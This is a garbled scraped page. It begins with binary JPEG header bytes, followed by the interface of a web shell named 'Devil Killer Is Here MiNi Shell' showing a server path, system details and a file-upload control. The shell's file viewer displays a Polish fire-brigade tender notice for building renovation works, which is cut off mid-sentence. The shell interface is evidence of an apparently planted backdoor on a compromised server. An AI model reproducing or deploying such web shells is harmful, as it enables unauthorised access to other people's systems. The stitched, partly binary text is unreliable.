JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251009/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251009/0046730801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont pomieszczeń i obiektów Jednostki Ratowniczo-Gaśniczej nr 1 Komendy Powiatowej Państwowej Straży Pożarnej w Kędzierzynie-Koźlu, ul. Mostowa 33, Część nr I i Część nr II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Powiatowa Państwowej Straży Pożarnej w Kędzierzynie-Koźlu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531419630</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kraszewskiego 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">077478616500</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kozlesekret@psp.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/kppsp-kedzierzyn-kozle</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Straż Pożarna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont pomieszczeń i obiektów Jednostki Ratowniczo-Gaśniczej nr 1 Komendy Powiatowej Państwowej Straży Pożarnej w Kędzierzynie-Koźlu, ul. Mostowa 33, Część nr I i Część nr II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1bcc90fb-d9c9-49cc-b530-6f974780e03b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00467308</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00088723/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont pomieszczeń i obiektów Jednostki Ratowniczo-Gaśniczej nr 1 Komendy Powiatowej Państwowej Straży Pożarnej w Kędzierzynie-Koźlu, ul. Mostowa 33.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1bcc90fb-d9c9-49cc-b530-6f974780e03b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty plików wykorzystywanych<br/>przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie<br/>ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań<br/>dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych”.<br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf;<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip<br/>b) .7Z<br/>3) Wśród formatów powszechnych a nie występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB.<br/>5) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym<br/>6) Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie<br/>z dokumentem podpisywanym.<br/>7) Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanie różnymi rodzajami podpisów np. osobistym<br/>i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>8) Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania<br/>wybranej metody podpisania plików oferty.<br/>7. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na platformie za pośrednictwem e-Zamówienia pod adresem:<br/>https://ezamowienia.gov.pl/pl/, nie za pośrednictwem adresu email.<br/>9) Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i<br/>zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert/wniosków.<br/>10) Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>11) Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>12) Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to<br/>skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Komendant Powiatowy Państwowej Straży Pożarnej w Kędzierzynie-Koźlu;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@psp.opole.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>przedmiotowego postępowania;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia<br/>publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PT.2370.8.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ NR I - Remont pomieszczeń Komendy Powiatowej Państwowej Straży Pożarnej w Kędzierzynie-Koźlu, w celu zabezpieczenia zasobów ochrony ludności w sytuacjach kryzysowych:<br/>A. ROBOTY BUDOWLANE:<br/>1. Roboty remontowe na klatce schodowej oraz pomieszczeniu 05,01<br/>- wykonanie nowych okładzin stopni i podestów z płytek ceramicznych z cokolikiem,<br/>- wykonanie posadzki z płytek ceramicznych z cokolikiem,<br/>- wymiana balustrady schodowej na stalową, ocynkowaną, malowaną proszkowo w kolorze<br/>RAL7016 z pochwytem,<br/>- wykonanie balustrady zabezpieczającej stalowej, ocynkowanej, malowanej proszkowo w kolorze<br/>RAL7016 na spoczniku (wnęka okienna),<br/>- wymurowanie ścianki oddzielającej na parterze z otynkowaniem dwustronnym z nadprożem<br/>i otworem drzwiowym,<br/>- montaż drzwi aluminiowych dwuskrzydłowych w wymurowanej ścianie,<br/>- wymiana drzwi wejściowych do pomieszczenia garażu- aluminiowe dwuskrzydłowe,<br/>- wymiana dwóch świetlików drewnianych na PCV z obustronnym obrobieniem na gotowo,<br/>- rozbiórka ścianki z luksferów i zamurowanie otworu po luksferach- odtworzenie elewacji<br/>zewnętrznej z dociepleniem,<br/>- wykonanie zabudów na ścianach, z ukryciem przebiegających instalacji (solary, klimatyzacja,<br/>centralne ogrzewanie, elektryka)<br/>- roboty tynkarskie po robotach elektrycznych,<br/>- wymiana drzwi do piwnicy,<br/>- montaż stropu podwieszonego kasetonowego,<br/>- malowanie powierzchni ścian z przygotowaniem powierzchni,<br/>- wymiana parapetów okiennych na granitowe,<br/>- wykonanie posadzki z płytek ceramicznych na schodach wejściowych do budynku z<br/>przygotowaniem podłoża.<br/>2. Roboty remontowe w pom nr 02,03,04<br/>- skucie okładziny ceramicznej z ścian i podłóg,<br/>- rozebranie podłoży posadzkowych,<br/>- rozebranie ścianek działowych z drzwiami w pomieszczeniach,<br/>- rozebranie stropu podwieszanego w pomieszczeniu 02,<br/>- montaż stropu podwieszonego kasetonowego ,<br/>- wykonanie nowych okładzin ceramicznych podłóg z cokolikami z wyrównaniem do poziomu<br/>korytarza,<br/>- wymiana drzwi do pomieszczenia 04 z wykonaniem nowego nadproża,<br/>- wymiana parapetów okiennych na granitowe,<br/>- roboty tynkarskie po robotach elektrycznych,<br/>- montaż nawiewników okiennych,<br/>- zamurowanie wnęk podokiennych oraz zamurowanie wnęk ściennych, - ułożenie mat gumowych ochronnych o grubości 45 mm w pomieszczeniu 02 i 03 na płytkach<br/>ceramicznych,<br/>3. Roboty remontowe w pom nr 07<br/>- demontaż drzwi z zamurowaniem otworu i obustronnym otynkowaniem,<br/>- demontaż istniejącej boazerii,<br/>- roboty tynkarskie po robotach elektrycznych<br/>- rozebranie warstw posadzkowych : parkiet i warstwa klejąca oraz schodów,<br/>- wykonanie nowej posadzki cementowej,<br/>- wykonanie posadzki z płytek ceramicznych z cokolikiem do poziomu posadzki na garażu,<br/>- wykucie otworu pod drzwi wejściowe z nadprożem<br/>- montaż nowych drzwi aluminiowych dwuskrzydłowych,<br/>- wymiana parapetów okiennych,<br/>- malowanie powierzchni ścian z przygotowaniem powierzchni,<br/>- montaż stropu podwieszonego kasetonowego,<br/>- montaż nawiewników okiennych,<br/>- montaż 10 sztuk regałów stalowych w kolorze szarym o wymiarach 200x100x60, z 5 półkami o<br/>nośności 100 kg każda.<br/>B. ROBOTY ELEKTRYCZNE:<br/>a) demontaż starej instalacji elektrycznej typu oprawy, gniazdka, łączniki, wywóz na wysypisko z<br/>utylizacją<br/>b) wykucie wnęk w murze pod rozdzielnice elektryczne, tynkowanie wnęk,<br/>c) przebicie ścian i stropów, montaż przepustów instalacyjnych<br/>d) wykucie bruzd pod montaż rur instalacyjnych,<br/>e) wykucie bruzd pod przewody elektryczne,<br/>f) montaż rur instalacyjnych,<br/>g) montaż korytek,<br/>h) zaprawianie bruzd,<br/>i) układanie przewodów elektrycznych w rurach, korytkach i pod tynkiem,<br/>j) montaż rozdzielnic elektrycznych,<br/>k) wykucie otworów pod puszki, montaż puszek,<br/>l) montaż łączników, gniazd elektrycznych,<br/>m) montaż opraw oświetleniowych,<br/>n) montaż okablowania do sieci LAN,<br/>o) montaż gniazd LAN,<br/>p) montaż sygnalizatorów optyczno-akustycznych,<br/>q) montaż głośników,<br/>r) wykonanie prób i badań instalacji elektrycznej.<br/>Powyższe roboty należy wykonać na podstawie załączonego Projektu Technicznego instalacji<br/>elektrycznych i w koordynacji z robotami budowlanymi.<br/>C. ROBOTY SANITARNE :<br/>1. Wykonanie robót instalacyjnych w pomieszczeniach oznaczonych na załączonym rysunku<br/>numerami 02, 03 w zakresie:<br/>- demontaż istniejącej armatury,<br/>- demontaż istniejących instalacji podtynkowych,<br/>- wymiana pionów kanalizacyjnych od stropu pomiędzy parterem a piętrem do poziomu piwnicy,<br/>- wykonanie wspomaganej instalacji wentylacyjnej.<br/>2. Wykonanie robót instalacyjnych w pomieszczeniach oznaczonych na załączonym rysunku<br/>numerami 07 w zakresie:<br/>- wkucie instalacji centralnego ogrzewania w ściany i przygotowanie nowych podejść pod kaloryfery,<br/>- wykonanie wspomaganej instalacji wentylacyjnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">51100000-3 - Usługi instalowania urządzeń elektrycznych i mechanicznych</p> <p class="mb-0">31000000-6 - Maszyny, aparatura, urządzenia i wyroby elektryczne; oświetlenie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ NR II -Remont wieży antenowej zlokalizowanej na terenie Jednostki Ratowniczo-<br/>Gaśniczej nr 1 Komendy Powiatowej Państwowej Straży Pożarnej w Kędzierzynie-Koźlu, mający<br/>na celu zapewnienie łączności z podmiotami ochrony ludności:<br/>1. POKRYCIE DACHU NA POZIOMIE +29,02M: Zakres prac obejmuje zerwanie istniejącej papy,<br/>oczyszczenie i zagruntowanie podłoża, założenie obróbek blacharskich na krawędzie, rynien ∅100 i rur<br/>spustowych ∅80 z blachy powlekanej w kolorze grafitowym (RAL 7016), następnie wykonanie nowego<br/>pokrycia z papy termozgrzewalnej na warstwie papy podkładowej. Należy uwzględnić obróbkę<br/>metalowych wsporników konstrukcji masztu stalowego.<br/>1*. POKRYCIE DACHU NA POZIOMIE +23,44M: Zakres prac obejmuje wyrównanie<br/>i zagruntowanie podłoża betonowego, wykonanie i montaż obróbek blacharskich z blachy powlekanej<br/>w kolorze grafitowym (RAL 7016), a następnie wykonanie nowego pokrycia z papy termozgrzewalnej<br/>na warstwie papy podkładowej z wywinięciem na ściany.<br/>2. BALUSTRADA: Zakres prac obejmuje demontaż istniejącej balustrady oraz montaż nowej<br/>balustrady stalowej o wysokości 120 cm, malowanej proszkowo w kolorze grafitowym (RAL 7016).<br/>3. STOLARKA OKIENNA: Zakres prac obejmuje demontaż istniejącej drewnianej stolarki okiennej<br/>wraz z oczyszczeniem powierzchni otworu i uzupełnieniem tynków na ościeżach. Następnie przewiduje<br/>się montaż nowej stolarki okiennej PCV z obróbką osadzenia. Okna jednoskrzydłowe,<br/>z szybą podwójną, uchylno–rozwieralne, w kolorze grafitowym (RAL 7016).<br/>4. STOLARKA DRZWIOWA: Zakres prac obejmuje demontaż istniejących drzwi zewnętrznych<br/>(2 szt.) wraz z oczyszczeniem powierzchni otworu i uzupełnieniem ubytków zaprawą. Następnie<br/>przewiduje się montaż nowych drzwi wejściowych o wym: 100 x 200 cm oraz drzwi na poziomie +23,44<br/>m o wymiarach 90 x 184 cm (UWAGA! NIETYPOWY WYMIAR). Stolarka drzwiowa stalowa,<br/>ocieplona, malowana proszkowo w kolorze grafitowym (RAL 7016), z wypełnieniem szczelin<br/>montażowych oraz estetycznym wykończeniem styku z istniejącą konstrukcją.<br/>5. WNĘKA OKIENNA NA ELEWACJI (IMITACJA OTWORU OKIENNEGO): Zakres prac<br/>obejmuje zagruntowanie podłoża, wykonanie warstwy zaprawy klejowej zbrojonej siatką, następnie<br/>nałożenie tynku strukturalnego o grubości 2-3 mm oraz wykończenie powierzchni powłoką malarską<br/>z farby akrylowej w kolorze grafitowym RAL 7016<br/>6. GZYMSY: Zakres prac obejmuje oczyszczenie zewnętrznych konstrukcji gzymsów betonowych,<br/>uzupełnienie ubytków betonowych oraz zabezpieczenie powierzchni powłoką hydrofobową.<br/>7. ELEWACJA Z CEGŁY KLINKIEROWEJ: Zakres prac obejmuje oczyszczenie elewacji ceglanej<br/>strumieniem wody pod ciśnieniem w celu usunięcia zanieczyszczeń i przywrócenia pierwotnej struktury<br/>powierzchni. Dodatkowo betonowy spód nadproży, należy oczyścić, ubytki uzupełnić gotową 